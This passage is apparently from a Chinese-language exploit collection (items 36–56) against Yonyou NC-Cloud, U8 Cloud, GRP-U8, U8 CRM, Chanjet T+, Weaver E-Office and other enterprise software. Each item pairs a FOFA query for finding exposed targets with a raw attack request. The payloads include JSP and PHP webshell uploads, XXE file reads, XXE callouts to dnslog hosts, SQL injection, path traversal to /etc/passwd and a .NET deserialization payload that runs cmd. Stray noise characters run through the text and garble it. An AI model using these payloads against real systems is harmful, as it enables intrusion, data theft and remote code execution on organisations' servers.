POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- ~7 V' R5 Y1 a x
Host: 203.25.218.166:8888/ p( [9 L% z% v- }0 k; Y+ g
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
, D* ?3 ]% s" _Accept-Encoding: gzip, deflate
6 c9 h. v) C, y0 W3 D6 d0 s) j7 ZAccept: */*
9 q" @$ ?/ S0 ?7 x/ NConnection: close
3 k/ O' z0 \0 x# naccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA* ~# S1 b, [9 t; V: U
Content-Length: 190
. Q) w8 @- B0 `, I% ~6 d' v, B' HContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0+ }+ [0 [' L9 E& g
+ H, r2 r% P- e+ m( _
--fd28cb44e829ed1c197ec3bc71748df0! q+ e/ u$ W- m# m6 q! W4 ]
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"9 ?- F0 i' l5 `" ?
# I* O7 X0 _9 \" i<%out.println(1111*1111);%>
6 N$ Z) b3 s9 i* {& G0 s/ _% d--fd28cb44e829ed1c197ec3bc71748df0--
2 t" _# M; I+ P, h/ A) y. G( ~: A( W- q
0 V$ a8 @' z+ u# D36. 用友NC-Cloud soapFormat XXE# R) R% v* E! r. [* C
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 J( n# I9 U* ?% e- U
POST /uapws/soapFormat.ajax HTTP/1.1' s8 J X2 a- p: m- ~
Host: 192.168.40.130:8989 A1 @8 D; a2 L8 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! n% f2 E+ B2 j+ K- u9 Y
Content-Length: 263
9 M# i0 H1 R( IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 k: o S3 [' R! ^
Accept-Encoding: gzip, deflate0 m& {- o6 C% {2 M% ~- e- S1 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 f; P# V9 K( o, S5 x8 y
Connection: close2 ^% w$ q' q1 o3 G& }% a
Content-Type: application/x-www-form-urlencoded
# g0 N: X. D1 E) OUpgrade-Insecure-Requests: 1 x6 M* Z, B4 j
7 M' T2 u5 [$ Hmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a7 X* y' y9 }7 V( j4 y
+ w$ d+ R$ l3 a6 X8 D) e
% B% _% U. |* |% h# x
37. 用友NC-Cloud IUpdateService XXE
2 i/ c3 V0 m% q/ QFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ m+ C: f2 b& m j6 J- T
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
: D, h+ m4 P4 G8 bHost: 192.168.40.130:89893 ?2 ~4 [* s8 V! L9 a8 y! d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36% w$ s; q7 E3 Z9 K
Content-Length: 421; _; R! p8 T9 S# g& F6 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 b( B, B$ y) ]/ P# ~Accept-Encoding: gzip, deflate
& s! X" W/ Q. j/ ]Accept-Language: zh-CN,zh;q=0.9
. U! A% z" L2 ~: IConnection: close
1 Z2 W" |, Y& ?, ^Content-Type: text/xml;charset=UTF-8
9 k5 e d! L& ?5 \/ VSOAPAction: urn:getResult! j3 n5 q9 ^& |/ Q7 i. k
Upgrade-Insecure-Requests: 1
+ [ L2 j1 s9 J* [
0 W$ I% q0 n) t<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">9 |( @+ [/ ^1 y% r. p) w. m- p6 P# o
<soapenv:Header/>$ `; I z! [/ o' z0 T3 ` I9 k
<soapenv:Body>
7 V, d: d( ?' w<iup:getResult>
& `0 [) S2 }: w1 a+ B P% F<!--type: string--># E6 H* l" m, @$ c3 ^6 J- H
<iup:string><![CDATA[
5 m' \+ u c" M+ u" N- l<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>2 H1 W7 G2 j/ p" J& {6 h
<xxx/>]]></iup:string>/ w7 C! I" m- v$ O
</iup:getResult>% Z- t5 q; {" \; `& y7 V0 V5 i
</soapenv:Body>
% W# g) \9 N G1 c, L</soapenv:Envelope>9 }' T7 L$ d3 O6 ^
W7 c5 x, L6 u: ~: S2 W8 _$ z
' U: h% R) C8 Z" v0 C8 E
- z: c4 V6 B- p, T
38. 用友U8 Cloud smartweb2.RPC.d XXE$ L5 K$ Y$ l* }6 j$ {, s4 f' p
FOFA:app="用友-U8-Cloud"
) d5 G! u5 N) B8 \9 jPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1; q. H; @$ I4 n# w: U
Host: 192.168.40.131:8088
- q0 D6 W- W! L2 G* bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
! [0 r6 i) b9 w# @$ F. EContent-Length: 2606 q8 u1 o1 o. b' H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
/ j& n7 w6 d/ B5 w6 S2 jAccept-Encoding: gzip, deflate" L- y% {7 x4 s M- k# }; p* N1 D
Accept-Language: zh-CN,zh;q=0.9& G9 ], p* A0 R
Connection: close
% R, [, i8 E W' gContent-Type: application/x-www-form-urlencoded9 z4 G# I& b6 @5 g" h& F7 V- F
! O( J# M( k3 O% L
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>5 o) ~2 A3 Z$ B( [1 {
2 ~: Y9 A" I: n4 A9 n' q0 R- R+ t5 X+ z) ?* q0 A
39. 用友U8 Cloud RegisterServlet SQL注入
$ k$ t: A4 b# n) o8 N% SFOFA:title="u8c"
; R2 j# E A( w' p4 }POST /servlet/RegisterServlet HTTP/1.1
- O+ E1 d, w, b' r8 c. UHost: 192.168.86.128:8089
# y6 g/ [7 Z3 g3 r. o; W3 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
; g. ?% G1 y/ _. ^7 @Connection: close
2 G7 U8 T$ p8 E9 b; `! ?; A5 B3 GContent-Length: 85" K7 g: q" x: f3 i6 J8 y5 v/ Q) s
Accept: */*, j) X& Z7 w5 B4 s" [
Accept-Language: en' U/ V) r; r0 v. `+ s
Content-Type: application/x-www-form-urlencoded# c- t! T; `# h. G. P0 Z+ ?
X-Forwarded-For: 127.0.0.1
4 p) L* C0 a$ ^) ?Accept-Encoding: gzip! p5 Z% @3 i9 }7 c P3 I
. a6 Q6 S% W7 [7 l& X: _# m. _
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# i0 }' s1 v: q$ Q) t& s. j3 _5 O6 o" i t+ k6 A3 @
; y1 S. ]. k: t; ~40. 用友U8-Cloud XChangeServlet XXE% b. y) v7 F0 v% x7 z
FOFA:app="用友-U8-Cloud"
) [3 S) l0 H. j$ i" pPOST /service/XChangeServlet HTTP/1.13 z6 c7 S1 |7 u4 X( z7 F8 t) j
Host: x.x.x.x0 S. ^( t6 X. `2 v5 c/ D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% H6 c# T0 z$ g8 ~; @$ a n6 ?
Content-Type: text/xml
4 }. [" a6 P0 x! ?' {9 \Connection: close
" d4 C4 A6 y& ^4 i* E$ j/ [$ x5 t K. V% w5 f8 p( S6 e! e
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! w4 P& Y1 n" U& L4 {8 B" {9 T
# E9 v/ @1 K; B! B2 {0 a5 |- C- W, x( @8 D6 J! l! r; H
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入9 e' g+ o% r' @( }, e$ q+ S
FOFA:app="用友-U8-Cloud"% E% D. \# }' _; J! i
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.14 U' j ]2 R/ t
Host:; R: N7 f2 s; d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) D0 W0 ^. j- x1 i- x
Content-Type: application/json* { n) `' \# z3 B% q: k
Accept-Encoding: gzip
+ V+ _! X' ]2 k0 P; H2 dConnection: close
. H& L+ ~; |' G7 m& ?4 x* q6 ~$ b. v: Z
% F9 A; j. s. R h" J5 q" s42. 用友GRP-U8 SmartUpload01 文件上传9 V4 [; N5 X$ ]* U x4 F- f* D
FOFA:app="用友-GRP-U8"' V2 \$ z3 |. h" L! L( C" r
POST /u8qx/SmartUpload01.jsp HTTP/1.1) p' J! c) W7 Y! v k9 _4 m
Host: x.x.x.x7 p: e9 V* \/ q+ r2 o& ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt; x/ ~9 r7 K* o& G" M; \! j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.364 `, j' D$ o- f4 i& a
, s! g5 z3 }' C: [: g0 x
PAYLOAD5 N3 o8 o6 |& P% J
# |6 A# x; }8 B( ~6 V3 K. C
, o3 P( g$ ]; `3 Z' R
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
) f, z7 B; ?3 u! g9 O; A$ b( [) z# ?& [& m: Q8 {: j/ K! ]% c
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 a% @6 f4 |* _- L. N# A3 tFOFA:app="用友-GRP-U8"
+ ^$ Y3 O9 A; zPOST /services/userInfoWeb HTTP/1.1
! R; c6 e, W! { vHost: your-ip
9 |6 [0 o6 K) }9 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, W$ U, r9 ^' S& g1 ^/ O7 G3 l/ X9 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, z; L2 a |. f' I9 ?% bAccept-Encoding: gzip, deflate9 R; S8 }2 T% B9 }# A' ~
Accept-Language: zh-CN,zh;q=0.91 p4 k# _, N# U
Connection: close- Y; X1 X1 G' P
SOAPAction:
2 ^! q8 L7 Q4 J+ ^8 O! k2 rContent-Type: text/xml;charset=UTF-8
7 n1 v" s8 J0 \- t/ n+ z5 d; O. k. @" u# k
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">0 {6 k$ o+ r! ?: J
<soapenv:Header/>
! ^& s' a/ t+ G+ K/ ~ <soapenv:Body>- T: G1 W2 W$ q* W( t0 A) c
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ P: M9 n$ F) M, \& M& E; Y' q6 w2 U <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( U6 v! d2 H; a9 n
</ser:getUserNameById>
5 s1 S' i* L7 Q& N4 N </soapenv:Body>
: ~: [9 x3 I* W</soapenv:Envelope>, J& H' K+ X1 ^* D
3 ^& O; j' |8 A$ F4 F
( L* F" T# Y! O. T5 Z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* S- e7 m- _" }7 g @FOFA:app="用友-GRP-U8") F4 z! Y6 L5 G% @& e4 L
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( t: Q. C2 `+ P( o: [1 _' D9 W
Host: your-ip
, e. A" t4 ]' kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
; S% {8 ^$ v: yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& B9 k1 J# h' r$ RAccept-Encoding: gzip, deflate
2 Y% h8 i7 X1 ^Accept-Language: zh-CN,zh;q=0.95 |8 \4 B0 N9 d1 C( }! `; X
Connection: close# i7 d5 W# g3 X5 V9 `3 D
/ a7 B- @; u! Z* D
' P5 e Z1 r9 O45. 用友GRP-U8 ufgovbank XXE( S- L# Z, x! `1 A
FOFA:app="用友-GRP-U8": N2 Z4 I6 Y. ?, M; I8 X, G# d P% m& D
POST /ufgovbank HTTP/1.1 ]$ R i& w6 G( Z
Host: 192.168.40.130:2227 Q3 ?4 W. h, [* L5 Y% [: s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0- G- c3 V6 I& b
Connection: close ?. D: m8 }4 Y/ X4 \
Content-Length: 161/ L; v$ r6 r/ U$ ^3 V( w7 T4 [, P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 g! b% W& x( r- O! I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( h* g! W; ?5 f& o% t$ y" i
Content-Type: application/x-www-form-urlencoded
% N/ y5 D0 Y2 q* M+ X# u8 GAccept-Encoding: gzip- U2 p0 n5 G+ i$ e5 u
" [, w f6 w" `$ e$ }. \
reqData=<?xml version="1.0"?>: |! s2 [- [' L7 q. l. R0 @
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
: }# L! _7 n7 w8 a* m# J! P6 S. j# `4 |9 b$ i3 y# d8 Q
+ ]7 t& s- @5 A$ C7 j* C$ [46. 用友GRP-U8 sqcxIndex.jsp SQL注入) k3 u1 ~# }# a( U$ O& ^- Z4 |
FOFA:app="用友-GRP-U8"
( L) H, S0 X$ ~3 T$ W4 @GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
& J8 U9 e4 z5 q: THost: your-ip
' S3 U8 Q5 M0 |. bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36; u4 E4 A0 @6 T6 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ b7 b6 @& l" a- w
Accept-Encoding: gzip, deflate
8 P8 s9 n) ~2 t, K7 R: rAccept-Language: zh-CN,zh;q=0.9
+ n- S0 y3 Z4 O7 q6 GConnection: close
: z2 P, ]3 O( T4 I4 i7 Y- l9 X
* F* v: G& O) L( g, E% A4 V# x) I
8 v6 J2 D7 F' \& a9 Z47. 用友GRP A++Cloud 政府财务云 任意文件读取9 J( k: [" Z, x; C/ ~
FOFA:body="/pf/portal/login/css/fonts/style.css"- t: E; Z& r7 T1 n; m
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.12 ]) j# H: u3 k: G
Host: x.x.x.x
8 c. L, \7 Z1 c$ u* LCache-Control: max-age=0
$ U. T* B# b2 ], sUpgrade-Insecure-Requests: 1" D0 A% F9 y9 Z2 V/ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) f/ s. J- I" Q( y VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 ~/ h; X/ H4 r" Q% XAccept-Encoding: gzip, deflate, br
' r- \: c' B4 q. r" pAccept-Language: zh-CN,zh;q=0.97 Z* M' p/ V; s+ X$ h) x5 }
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
% J. v: y0 Z7 ~7 W( @9 |; {7 f, o# @" gConnection: close$ C+ {3 j+ ?- i9 H, a, `' c- f
: Y7 F& w$ Q& [! M
# O# d. t' H: Q/ r) s U
: }6 n0 K# T5 Y" h5 K0 h48. 用友U8 CRM swfupload 任意文件上传4 J. S3 M) t" h( i* M% k
FOFA:title="用友U8CRM"- k. g3 l9 o7 A
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
% e+ h9 F# y& Q' p5 b: t; qHost: your-ip8 q" c" y2 |% I5 l1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ X! x" L- B0 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* a; w# X: z2 H1 t: e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 c5 I1 D2 H$ _+ h
Accept-Encoding: gzip, deflate+ Y# x7 P ], a- w4 [4 \, Y
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
4 w6 ]: i' N0 s! ^( {------2695209672394068716424300668554 R( J# ^$ j `) U- k+ e
Content-Disposition: form-data; name="file"; filename="s.php"$ M4 ]0 ^# z+ j2 ?1 U- k+ @ O" z
1231
" w8 {" F z/ `% S* VContent-Type: application/octet-stream
+ M* b, _# d4 E0 H c------269520967239406871642430066855' G$ r5 n. r" P4 W V
Content-Disposition: form-data; name="upload"6 e/ t! X$ V! b3 i( e6 n
upload$ u$ v8 v, {9 {% w! g$ Z q8 c
------269520967239406871642430066855--* Z. A" N5 K4 L+ Z2 l0 Y
/ g/ Y7 e3 ~4 m! @# t. g; z' j7 [3 M2 s
49. 用友U8 CRM系统uploadfile.php接口任意文件上传( j) _4 Y5 v% Y! B/ G/ b
FOFA:body="用友U8CRM"
' @7 z% g5 I& d8 a+ a" c2 p2 x5 `/ W# N
+ `! i/ {4 J$ M: UPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1+ N9 R- \! z0 i) k! X
Host: x.x.x.x
, j" P! d( Z( f0 o1 J7 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: A8 ^4 c( g# |, E( z5 q
Content-Length: 329
: F& g* e1 i9 l: i* J- Y4 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 }9 F: _3 V. ^Accept-Encoding: gzip, deflate: l' [' ^8 z# Z G. {. [! _, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 V0 m; ?& s6 U0 m+ D" Y2 NConnection: close
3 S. v v% Q4 e2 }6 jContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
% j v0 i6 C% U0 d7 D* H9 ^% v: t, U8 s
-----------------------------vvv3wdayqv3yppdxvn3w
- O; S$ x1 W) v) a6 uContent-Disposition: form-data; name="file"; filename="%s.php "5 o# O# y* n: V- u
Content-Type: application/octet-stream; O0 l, ^9 ~, Y- U' }* S
& |$ o" y( I7 ]( [" a1 h8 S$ ^) E1 G, Xwersqqmlumloqa
+ N0 u+ G2 G! }2 T1 N$ U) M-----------------------------vvv3wdayqv3yppdxvn3w9 b3 @) \% [2 k: B9 T& o
Content-Disposition: form-data; name="upload"
* j& o) L5 _# @9 M7 @
% W/ o0 ?2 a. |. F/ k2 xupload
/ E! E, w( h+ }$ _ c6 G/ a* j6 `-----------------------------vvv3wdayqv3yppdxvn3w--4 g. [ g( L% `
, S9 w( I0 N+ s# C
; l" k: a" n2 V! _http://x.x.x.x/tmpfile/updB3CB.tmp.php
; t2 }2 r& F( S% G9 g: k$ j8 S2 s9 F. {# k1 h# i0 b
50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 p0 n' t& ^( d/ I% i; s$ ?FOFA:body="close closebtnmodal"
( j; ] O5 k! ?% n$ [1 GPOST /course/filterRecords/ HTTP/1.17 r/ |" o0 M7 E8 D k) s
Host: x.x.x.x1 v3 A/ W8 g4 x( S
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 X( b7 H3 q" {/ I- J3 {
Connection: close: t G. m1 V( X) ^; Y
Content-Length: 224& e: P' r8 Q0 A# @3 i7 c( H" U5 C3 ?
Accept: */*
3 @: x: ` x9 E5 WAccept-Language: en" \9 c$ Y! t* Y( w9 j
Content-Type: application/x-www-form-urlencoded( c: z4 T I- Z5 F' u& o1 E
Accept-Encoding: gzip1 r5 X9 j9 i& K8 j; x; J
, l/ b/ C& v2 @' p8 s" ?7 v% J& ~searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
. @7 a) r9 j1 d& r' E! H. [5 i" b% W& |0 F( r! D9 c# |$ b
/ H9 I' K; ]/ K7 d8 ?3 [6 x6 U- t4 `
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入& @, G- I s: g% Q5 V
FOFA:app="云时空社会化商业ERP系统"
/ h7 S# s" r& I" f/ W7 }2 @GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.16 P0 X2 ?' P! A3 j( o6 z A8 X
Host: your-ip! W7 m* h& O: k+ B v
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
2 @9 Z) N/ p) ^1 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. y& C U/ N- D9 ?3 SAccept-Encoding: gzip, deflate
7 a$ E% \5 B ]7 \8 wAccept-Language: zh-CN,zh;q=0.92 ]3 o8 v7 {5 W, y7 ]$ I
Connection: close/ S) l% M& ~% V* b/ R4 U
9 W4 K( [8 `& w R u8 B+ n8 w P7 L6 h& m6 ]5 K& P( q2 c B/ o
52. 泛微E-Office json_common.php sql注入3 V; J2 J. \1 P2 @# R! `
FOFA:app="泛微-EOffice" X! K' ^" G3 v7 o' H+ ~, }3 h! C
POST /building/json_common.php HTTP/1.1
! q2 z' e3 b ~9 pHost: 192.168.86.128:8097
1 S) @; ]& Z7 b9 f# XUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- x6 _3 G3 u' k! M# X% w
Connection: close
# Y1 Y% J+ f/ l( wContent-Length: 87
$ O0 U9 d6 F: d4 L& X5 gAccept: */*
6 k, e0 y F+ E: P- }- W) q* ]Accept-Language: en
- V. m* w6 a$ @8 l& y: ]Content-Type: application/x-www-form-urlencoded" h" f& G; i- S8 K% l/ ]1 \, O j' o
Accept-Encoding: gzip- V# [6 s6 k ^6 l6 r$ C9 F! f8 O
" m3 y1 A0 a, }3 Htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
, g5 x9 x2 ~ W/ H
" X& G' g# c' K' l" X. \9 P0 @- h
$ S3 ]; g& X; n* G4 ?53. 迪普 DPTech VPN Service 任意文件上传
9 W: F: h3 d1 Z3 m0 O5 Y$ g rFOFA:app="DPtech-SSLVPN"
: u2 X, F5 ~5 ~; L3 M; R/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
% Y. ?/ t! w9 s/ q7 W/ v
1 n+ N3 U @# ]. a! @* m0 c* W
( b4 ^5 m4 ]! a, a54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 w( g( \( N5 E* w. AFOFA:app="畅捷通-TPlus"( J1 E0 I6 {* b3 t% d" k1 J
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件$ _7 G* R( Q% K2 v: F; g& ^- S7 w; O
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 x+ I2 l0 W( j. \' M) T
/ R; B2 K: E* o. p+ x2 z* N8 o( F
4 n. v0 g! J- ^完整数据包& e, @) y/ X* J$ L& L
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.12 B5 E8 b* g# e0 m& Q
Host: x.x.x.x
; E( @0 N1 G3 X: I" @) x# [User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F, R# ~- P, z$ L
Content-Length: 5934 A/ g' K% N; K9 }7 Q
+ S* k/ z6 @& L# \{; O1 W) I- F3 F' V0 t
"storeID":{$ a+ d- _! o9 V3 C) s( b
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 G, Y$ Y4 { Y" A
"MethodName":"Start",7 R' d- v6 `, _6 }# X% G
"ObjectInstance":{
: Z3 p5 P, G! w: @3 p "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 E4 C- _4 N9 i& `1 ^1 x) _" _2 U
"StartInfo":{
& e* ]7 ^& D9 y. Z4 u2 _ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ s8 U4 F2 |, K6 V "FileName":"cmd",
6 m- b+ M% E" V1 y "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"( @. }, H; }( ?
}
/ ?% f3 g J9 z; R L% a }
0 R7 @* Q& \5 j! z- R }
, g# d) v, H+ @) D9 \3 w& L; c; R: O# g}
`) X; U* o3 i
. J2 S0 L' J$ ]6 B2 o! Q. X
6 H& @1 ?; u: O' }( k, p第二步,访问如下url
( |* i- F: ?& z; _/ r% x+ [, K) u/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt, t2 s6 w* J0 G! |. e' Z5 U
1 r* B% b# T1 B1 \ }( v. ~' W* `" d
55. 畅捷通T+ getdecallusers信息泄露
, J3 H6 H# W P+ y9 o7 j* q3 EFOFA:app="畅捷通-TPlus"- e. ^: M# ?% x$ N, W
第一步,通过7 ?" c$ g7 a$ {5 x' I! L+ X
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie& `! e$ B" c9 m6 ?5 h
第二步,利用获取到的Cookie请求
; a- e/ D# x4 P( e+ V) {/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers0 y' l9 A( T- ]" G7 X
( ~* w. S4 s9 d; g$ O% w56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" Q; B' r8 I& i! G
FOFA: app="畅捷通-TPlus"
/ Q* F$ o7 I: ePOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
, X* X: y0 S! |# L7 z! DHost: x.x.x.x1 U8 M% L$ y. h6 X& m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 \ W$ B- F( a0 g9 J# E/ v8 ~) ?1 u8 q
Content-Type: application/json. z _+ s& l( `( k: d, ]$ Z' M
